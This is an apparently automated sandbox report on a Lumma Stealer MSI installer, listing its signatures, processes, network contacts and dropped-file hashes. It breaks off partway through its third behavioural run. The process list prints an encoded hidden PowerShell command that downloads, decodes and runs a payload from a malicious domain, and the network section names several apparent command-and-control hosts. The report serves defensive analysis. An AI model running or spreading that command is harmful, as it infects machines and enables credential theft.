Malware Analysis Report

2024-11-30 05:21

Sample ID 240710-mea4lathre
Target setup.msi
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
Tags
lumma execution persistence privilege_escalation stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431

Threat Level: Known bad

The file setup.msi was found to be: Known bad.

Malicious Activity Summary

lumma execution persistence privilege_escalation stealer

Lumma Stealer

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Enumerates connected drives

Blocklisted process makes network request

Downloads MZ/PE file

Suspicious use of SetThreadContext

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Event Triggered Execution: Installer Packages

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-10 10:22

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-10 10:22

Reported

2024-07-10 10:29

Platform

win10v2004-20240709-en

Max time kernel

93s

Max time network

203s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Lumma Stealer

stealer lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC11D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC3FF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC578.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c081.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57c081.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC509.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c085.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC247.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDFC9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{982F5EC8-DA77-4501-8948-29ED7D39B6D6} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC361.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDAB6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDB15.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5068 wrote to memory of 2700 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5068 wrote to memory of 2700 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5068 wrote to memory of 2700 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5068 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 5068 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 5068 wrote to memory of 1680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 5068 wrote to memory of 1680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 2276 wrote to memory of 1840 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 1840 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 232 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe
PID 2276 wrote to memory of 232 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 0FD73AC00305F1B6DA071516160BD19D

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAwADIAMAA3ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 2.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 get-license2.com udp
US 172.67.223.2:443 get-license2.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 2.223.67.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 hit-1488.com udp
US 172.67.184.27:80 hit-1488.com tcp
US 8.8.8.8:53 27.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 replica-souls.com udp
US 172.67.139.60:443 replica-souls.com tcp
US 8.8.8.8:53 two-root.com udp
US 104.21.27.114:443 two-root.com tcp
US 8.8.8.8:53 60.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 114.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 run-df.com udp
US 104.21.11.249:80 run-df.com tcp
US 104.21.11.249:443 run-df.com tcp
US 8.8.8.8:53 249.11.21.104.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 respectabledpcs.shop udp
US 172.67.131.221:443 respectabledpcs.shop tcp
US 8.8.8.8:53 bouncedgowp.shop udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 8.8.8.8:53 bannngwko.shop udp
US 172.67.146.61:443 bannngwko.shop tcp
US 8.8.8.8:53 221.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 198.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 bargainnykwo.shop udp
US 172.67.146.97:443 bargainnykwo.shop tcp
US 8.8.8.8:53 affecthorsedpo.shop udp
US 172.67.135.137:443 affecthorsedpo.shop tcp
US 8.8.8.8:53 radiationnopp.shop udp
US 104.21.68.158:443 radiationnopp.shop tcp
US 8.8.8.8:53 61.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 97.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 137.135.67.172.in-addr.arpa udp
US 8.8.8.8:53 answerrsdo.shop udp
US 104.21.44.192:443 answerrsdo.shop tcp
US 8.8.8.8:53 publicitttyps.shop udp
US 104.21.25.154:443 publicitttyps.shop tcp
US 8.8.8.8:53 benchillppwo.shop udp
US 172.67.160.230:443 benchillppwo.shop tcp
US 8.8.8.8:53 192.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 158.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 154.25.21.104.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 reinforcedirectorywd.shop udp
US 172.67.214.98:443 reinforcedirectorywd.shop tcp
US 8.8.8.8:53 230.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 98.214.67.172.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Windows\Installer\MSIC11D.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSIC509.tmp

MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

C:\Windows\Installer\MSIDB15.tmp

MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

C:\Config.Msi\e57c084.rbs

MD5 42f15099ec2521134a8fed2c29e2b0fc
SHA1 6e6fed8da954786f5804f3c78c7d19ec53a017df
SHA256 fefd219ed2238b11a22b137c5e8f116bcb52ee027c60585ac3df25a6e2353e5c
SHA512 f577fbb876693d329185eacc9ffd8ec334758e7bc24aebccde93db77063f90df50a66dbbcf1551901d7f9285c63cc8d0e8f336d4895092ef93d22774eed9a113

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

MD5 63efe86838e7196cedd93d7c10ac40e6
SHA1 61dcc0ce49355f1f44a7c2ee97ace10feece2e03
SHA256 9e7f5695c50bde002223c72084b44d8d22ab12c3ad2ce993e1f08ae90c6d6172
SHA512 7773e45af4c85b35aa9afb347fab3723eef9469cd4ed45fda89e058167a57b66b106ef8cce7fdc90701dd13279a8ab61e45f7f4c7df8fd084e6513f362483dac

C:\Windows\Installer\e57c081.msi

MD5 6e619d3d24f58bfb7bd7e76a4756e258
SHA1 890359e1e86525c4c14e975e762239878134b32d
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
SHA512 1a1f432c3c8ed5c627b2724b1fc5600ba31859838445b67d137c29439345e48bebe16074c3d9f909958af31670764422b379d7ced52c13feca7468e25a10162e

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

MD5 ae63517a3ce7949a2c084cd7541c2fd8
SHA1 8dafa610a0c3aa6ee2e50f657c90757bfae80336
SHA256 14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26
SHA512 fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

MD5 1825d0310bf5029899f42004c4a1ef83
SHA1 ac79aab26730982838f5af5eadfa1e48f4625947
SHA256 1c45bf1b4b0dbbf3eec7fbe8d08640c8df98a9679c9753a295a5d2e29d8b6a58
SHA512 7c7c433b74c9b247401af4b72563256bfef055a8f5e65071ddcffe727502445be7760b64a1e7844e69c625dda899b928500dcb2c144defcc1ccf2ed206632145

memory/1680-161-0x00000189E52C0000-0x00000189E52E5000-memory.dmp

memory/1680-158-0x00000189E5650000-0x00000189E5651000-memory.dmp

memory/2276-163-0x0000000000780000-0x00000000007A8000-memory.dmp

memory/2276-162-0x0000000000780000-0x00000000007A8000-memory.dmp

memory/2276-164-0x0000000000780000-0x00000000007A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpopif3g.pgc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1840-175-0x000001B3CAB90000-0x000001B3CABB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe

MD5 c3a8a0fd943924bfbd176c99df56ed2c
SHA1 8bc8d69cbec44704f062c08a919da992a425c720
SHA256 d1556baf48f206639e69f0e800e3360aa362f267c1c30b724140b6c713648df6
SHA512 71edb53cbf8d52d79615d5db834430870d6764ddcca4d8cf61d5fc4ddf404b259a974eb90944028ff20153561aa8b9fcc3374ae9badc6f6ac6b6d30150444f41

memory/1840-197-0x000001B3CD110000-0x000001B3CD12C000-memory.dmp

memory/2276-198-0x0000000000780000-0x00000000007A8000-memory.dmp

memory/1840-233-0x000001B3CD380000-0x000001B3CD542000-memory.dmp

memory/1840-234-0x000001B3CDA80000-0x000001B3CDFA8000-memory.dmp

memory/2276-239-0x0000000000780000-0x00000000007A8000-memory.dmp

memory/232-244-0x00007FF64D810000-0x00007FF64E191000-memory.dmp

memory/3196-245-0x0000000000A00000-0x0000000000A57000-memory.dmp

memory/3196-247-0x0000000000A00000-0x0000000000A57000-memory.dmp

memory/232-246-0x00007FF64D810000-0x00007FF64E191000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-10 10:22

Reported

2024-07-10 10:29

Platform

win11-20240709-en

Max time kernel

149s

Max time network

282s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
